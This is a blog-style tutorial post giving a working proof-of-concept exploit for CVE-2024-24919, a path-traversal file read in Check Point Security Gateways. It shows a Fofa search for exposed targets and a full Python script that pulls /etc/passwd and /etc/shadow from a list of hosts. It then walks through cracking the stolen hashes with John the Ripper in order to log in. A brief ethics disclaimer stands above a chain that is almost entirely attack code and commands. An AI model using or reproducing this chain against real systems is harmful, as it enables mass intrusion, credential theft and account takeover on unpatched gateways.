CVE-2024–24919 POC
Potentially allowing an attacker to read certain information on Check Point Security Gateways once connected to the internet and enabled with remote Access VPN or Mobile Access Software Blades. A Security fix that mitigates this vulnerability is available.
Read about it — https://nvd.nist.gov/vuln/detail/CVE-2024-24919
This POC is made for educational and ethical testing purposes only. Usage of this tool for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
So lets start!
To find some targets I used Fofa (Simaler to shodan.io):
Fofa Dork: app=”Check_Point-SSL-Network-Extender”
Now git clone:
git clone https://github.com/verylazytech/CVE-2024-24919.gitOr copy manually exploit.py:
import argparse
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Suppress SSL warnings
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
vuln = ['root:', 'nobody:']
def make_request(url, payload=None, headers=None):
try:
response = requests.post(url, data=payload, headers=headers, verify=False)
if response.ok:
for word in vuln:
if word in response.text:
print(f"[+] {url} is vulnerable")
if payload:
if "etc/shadow" in payload:
print("╔══════════════════════════════════════════════════════╗")
print("║ /etc/shadow found: ║")
print("╚══════════════════════════════════════════════════════╝")
with open("shadow", "w") as file:
file.write(response.text)
elif "etc/passwd" in payload:
print("╔══════════════════════════════════════════════════════╗")
print("║ /etc/passwd found: ║")
print("╚══════════════════════════════════════════════════════╝")
with open("passwd", "w") as file:
file.write(response.text)
print("╔══════════════════════════════════════════════════════╗")
print(f" {response.text} ")
print("╚══════════════════════════════════════════════════════╝")
print("If you found this useful, consider buying me a coffee:")
print("https://www.buymeacoffee.com/VeryLazyTech")
print("@VeryLazyTech")
return
print(f"[-] {url} is not vulnerable")
else:
print(f"[-] {url} responded with status code: {response.status_code}")
except requests.RequestException as e:
print(f"Error making request to {url}: {e}")
def main():
payload = "aCSHELL/../../../../../../../etc/passwd"
payload2 = "aCSHELL/../../../../../../../etc/shadow"
parser = argparse.ArgumentParser(description="CVE-2024-24919 POC - VeryLazyTech")
parser.add_argument("-l", metavar='filename', type=str, help="File containing list of HTTP/HTTPS targets")
parser.add_argument("-f", metavar='file', type=str, help="File to read for custom payload (May break on multiple targets with unknown files.)")
args = parser.parse_args()
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate, br",
"Upgrade-Insecure-Requests": "1",
"Sec-Fetch-Dest": "document",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-Site": "none",
"Sec-Fetch-User": "?1",
"Dnt": "1",
"Sec-Gpc": "1",
"Te": "trailers",
"Connection": "close"
}
payload_base = "aCSHELL/../../../../../../../{}"
if args.f:
payload = payload_base.format(args.f)
if args.l:
try:
with open(args.l, 'r') as file:
urls = file.readlines()
for url in urls:
url = url.strip()
if url.startswith('http://') or url.startswith('https://'):
make_request(url + '/clients/MyCRL', payload=payload, headers=headers)
make_request(url + '/clients/MyCRL', payload=payload2, headers=headers)
else:
print(f"Skipping invalid URL: {url}")
except FileNotFoundError:
print(f"Error: File '{args.l}' not found.")
else:
print("Please provide a file containing list of HTTP/HTTPS targets using -l option.")
if __name__ == "__main__":
main()Save this exploit in python file like exploit.py
Next chose your target and add it to list.txt file in this format:
https://ip_addressRun the Exploit:
python3 exploit.py -l list.txtNow There are 2 options of output:
Unsuccessful:
Successful:
Now after you find both file passwd & shadow you can try crack the hash with JohnTheRipper, after running the exploit you have 2 files, passwd & shadow, so you can merge them into one file and try crack them (I used rockyou.txt but it can be any password wordlist):
unshadow passwd shadow > unshadowed.txt john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
And now after we crack the hash we can login to the user!
📎 If You like my content and you want some more, View On My Shop bundle of 20+ E-Books for your OSCP!
